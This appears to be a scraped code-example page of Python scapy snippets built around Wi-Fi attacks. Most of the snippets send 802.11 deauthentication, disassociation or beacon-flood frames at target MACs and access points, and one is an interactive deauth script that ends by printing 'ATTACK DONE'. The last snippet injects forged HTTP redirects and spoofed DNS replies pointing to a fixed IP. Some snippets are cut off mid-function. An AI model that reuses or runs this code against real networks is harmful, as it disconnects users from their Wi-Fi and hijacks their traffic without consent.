Esempio n. 1
0
    def _deauth_target(self, target, packet_count):
        # This also works with subtype 10, "Disassociation-Frame", verified
        # with MBP running 10.12.4
        ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11(
            type=0,
            subtype=12,
            addr1=target,
            addr2=self._ap_bssid,
            addr3=self._ap_bssid) / scapy.Dot11Deauth(reason=1)

        actually_sent = 0
        for n in range(packet_count) or packet_count == -1:
            if not self._thread_event.isSet():
                break

            if n % 64 == 0:
                time.sleep(0.1)

            scapy.sendp(ap_to_client_pckt)

            actually_sent = n

        print "Sent " + str(actually_sent + 1) + " packets to " + target

        with self._thread_lock:
            self._threads_finished += 1
Esempio n. 2
0
 def deuath(self, ap: AccessPoint):
     """
     Sends deauth packets to a given access point.
     """
     pkt = (scapy.RadioTap() / scapy.Dot11(
         addr1="FF:FF:FF:FF:FF:FF", addr2=ap.bssid, addr3=ap.bssid) /
            scapy.Dot11Deauth(reason=7))
     while True:
         scapy.sendp(pkt, iface=self._interface)
Esempio n. 3
0
    def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"):
        global ipiw_lock
        ipiw_lock.acquire()
        # AP -> Client
        p1 = sc.RadioTap() / sc.Dot11(
            type=0,
            subtype=12, addr1=client, addr2=mac, addr3=mac) / sc.Dot11Deauth(
                reason=5)  # reason = "AP cannot handle this many stations"
        # Client -> AP
        p2 = sc.RadioTap() / sc.Dot11(
            type=0,
            subtype=12, addr1=mac, addr2=client, addr3=mac) / sc.Dot11Deauth(
                reason=8)  # reason = "Client is leaving"

        # socket (for performance)
        s = sc.conf.L2socket(iface=self.netifmon)
        for i in range(100):
            s.send(p1)
            s.send(p2)
        s.close()
        ipiw_lock.release()
Esempio n. 4
0
 def scan(self):
     target_mac = "28:cf:e9:1e:50:2d"
     gateway_mac = "0a:00:27:00:00:0e"
     # 802.11 frame
     # addr1: destination MAC
     # addr2: source MAC
     # addr3: Access Point MAC
     dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
     # stack them up
     packet = scapy.RadioTap()/dot11/scapy.Dot11Deauth()
     # send the packet
     scapy.sendp(packet, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
Esempio n. 5
0
def craft_disas_packet(sender, receiver, bssid):
    """
    Return a disassociation packet crafted with given information

    :param sender: The MAC address of the sender
    :param receiver: The MAC address of the receiver
    :param bssid: The MAC address of the AccessPoint
    :type sender: str
    :type receiver: str
    :type bssid: str
    :return: A disassociation packet
    :rtype: scapy.layers.dot11.RadioTap
    """
    return (scapy.RadioTap() / scapy.Dot11(
        type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) /
            scapy.Dot11Disas())
Esempio n. 6
0
	def pkt(self, info):
		dot11 = scapy.Dot11(
				type=0,
				subtype=8,
				addr1=broadcast,
				addr2=self.sender,
				addr3=self.sender
			)
		beacon = Dot11Beacon()
		essid = Dot11Elt(
				ID=self.channel,
				info=info,
				len=len(info)
			)
		frame = scapy.RadioTap()/dot11/beacon/essid
		return frame
Esempio n. 7
0
 def __init__(self, ssid, cap="ESS+privacy"):
     dot11 = scapy.Dot11(type=0,
                         subtype=8,
                         addr1=broadcast,
                         addr2=str(scapy.RandMAC()),
                         addr3=str(scapy.RandMAC()))
     beacon = scapy.Dot11Beacon(cap=cap)
     essid = scapy.Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
     rsn = scapy.Dot11Elt(ID="RSNinfo",
                          info=('\x01\x00'
                                '\x00\x0f\xac\x02'
                                '\x02\x00'
                                '\x00\x0f\xac\x04'
                                '\x00\x0f\xac\x02'
                                '\x01\x00'
                                '\x00\x0f\xac\x02'
                                '\x00\x00'))
     self.pkt = scapy.RadioTap() / dot11 / beacon / essid / rsn
Esempio n. 8
0
def sendRTS(MAC1, MAC2, MAC3):
    millis = 615
    blob = struct.pack("<H", millis)
    millis = struct.unpack(">H", blob)[0]

    packet2 = scapy.RadioTap(present="Flags", Flags="FCS")
    packet2 /= Dot11FCS(addr1=MAC1,
                        addr2=MAC2,
                        addr3=MAC3,
                        addr4="00:00:00:00:00:00",
                        subtype=11,
                        type=1,
                        ID=millis)
    packet2 /= scapy.Dot11Beacon(cap="ESS", timestamp=1)
    packet2 /= scapy.Dot11EltRates(rates=[130, 132, 11, 22])
    #packet2 /= scapy.Dot11Elt(ID="DSset", info="\x03")
    #packet2 /= scapy.Dot11Elt(ID="TIM", info="\x00\x01\x00\x00")
    #p = scapy.srp(packet2,iface=monitor_if, timeout=0.1)
    sendp(packet2, iface=monitor_if, inter=0.1, loop=1)
Esempio n. 9
0
def disconnect_device(router_mac: str, target_mac: str, iface: str,
                      count: int):
    """
    Force deauthenticate a device.

    Args:
        router_mac (str): Gateway MAC address.
        target_mac (str): MAC address of target device.
        iface (str): Ethernet Interface Name.
        count (int): Number of packets to be sent.
    """
    if count == 0:
        count = None
    dot11 = sc.Dot11(type=0,
                     subtype=12,
                     addr1=target_mac,
                     addr2=router_mac,
                     addr3=router_mac)
    packet = sc.RadioTap() / dot11 / sc.Dot11Deauth(reason=7)
    sc.sendp(packet, inter=0.1, count=count, iface=iface, verbose=0)
Esempio n. 10
0
def main(dev):
    subprocess.call(['ip', 'link', 'set', 'dev', dev, 'up'])
    scapy_L2socket = scapy.conf.L2socket(iface=dev)
    try:
        station_info = initialize_stations(ssid_list, ssid_suffixes,
                                           SSID_DUPLICATES)
        loop_interval = (BEACON_INTERVAL * 0.001024) / len(station_info)
        now = time.monotonic()
        packet_sent = 0
        last_stat = now
        last_hop, next_hop = now, 7.5
        last_rand, next_rand = now, 10
        last_loop = now
        while True:
            now = time.monotonic()
            if now - last_stat >= 5:
                last_stat = now
                print('{} packet sent'.format(packet_sent))
                packet_sent = 0
            if now - last_hop >= next_hop:
                last_hop = now
                next_hop = random.random() * 5 + 5
                hop_channel(dev)
            if now - last_rand >= next_rand:
                last_rand = now
                next_rand = random.random() * 10 + 10
                randomize_station(random.choice(station_info))
            packet = create_beacon_packet(random.choice(station_info))
            packet = scapy.RadioTap(b'\x00\x00\x08\x00\x00\x00\x00\x00' +
                                    packet)
            scapy_L2socket.send(packet)
            packet_sent += 1
            now = time.monotonic()
            if now - last_loop < loop_interval:
                last_loop += loop_interval
                time.sleep(last_loop - now)
            else:
                last_loop = now
    finally:
        scapy_L2socket.close()
Esempio n. 11
0
#Start program
print(f"{RED}" + start)

#Show intructions
print(
    f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n"
)

#Get informations from router
target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ")
gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ")
interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ")
packets = int(input(f"{CYAN}Number os packets={RESET} "))

#Create packet
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7)

# send the packets
p = 0
while p <= packets:
    scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
    print(f"{YELLOW}[!] Packets send " + str(p))  #show number of send packets
    p += 1

print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
    apNum = raw_input(
        "Pleas choose Ap from list above to see all devices on  the AP \033[1m--enter Ap number--\033[0m"
    )
    print("connect to: ", ap[int(apNum)])
    #step 3: we scan all devices on the AP
    scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20)
    #step 4 :chose Client MAC Address to attack
    macNum = raw_input(
        "Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m"
    )
    print("connect to: ", clients[int(macNum)])

    # Access Point MAC Address
    ap = ap[int(apNum)]

    # Client MAC Address
    client = clients[int(macNum)]

# Deauthentication Packet For Client
#             Use This Option Only If you Have Client MAC Address
pkt1 = scapy.RadioTap() / scapy.Dot11(addr1=ap, addr2=client,
                                      addr3=client) / scapy.Dot11Deauth()

t_end = time.time() + 100
while time.time() < t_end:

    scapy.sendp(pkt1, iface="mon0", inter=0.001)

raw_input(
    " '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")
Esempio n. 13
0
def pkt_callback(pkt):

    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # construct fake l2 for wifi packet
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(
            addr1=macl.addr2,
            addr2=macl.addr1,
            addr3=macl.addr3,
            FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # construct fake l2 for ethernet packet
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst=macl.src, src=macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return

    if pkt.haslayer(scapy.IP):
        # construct fake l3
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return

    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # construct fake layer 4 for TCP
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)

        if tcpl.flags == 2:  # syn
            return
        elif tcpl.flags == 24 or tcpl.flags == 16:  # psh ack
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")

                    dsturl = helper.getdsturl(tcpdata)

                    if dsturl is None:
                        return

                    print("IP: %s, DST URL: %s" %
                          (pkt.getlayer(scapy.IP).src, dsturl))

                    if dsturl.find('0x0a') != -1 or dsturl.find(
                            '85.17') != -1 or dsturl.find(
                                'twitter') != -1 or dsturl.find(
                                    'facebook') != -1 or dsturl.find(
                                        'vk.com') != -1 or dsturl.find(
                                            'blogger') != -1 or dsturl.find(
                                                'odnoklassniki') != -1:
                        print "inject success"
                        return

                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    credirpkt = redirpkt

                    # construct reply packet
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"

                    # construct fin packet
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)

                    # add redir payload to reply packet
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)

                    packetbasket = [pktreply, finpktreply]

                    # send reply packet
                    scapy.sendp(packetbasket, verbose=0, iface=interface)
                    print("Reply sent")
            return

        elif tcpl.flags == 17:  # fin ack
            return

    elif pkt.haslayer(scapy.UDP):
        # construct layer 4 for UDP
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)

        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))

                pktreply = l2 / l3 / l4 / scapy.DNS(
                    id=dnsl.id,
                    qr=1,
                    qd=dnsl.qd,
                    an=scapy.DNSRR(
                        rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose=0, iface=interface)
                print("Reply sent")
        return

    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return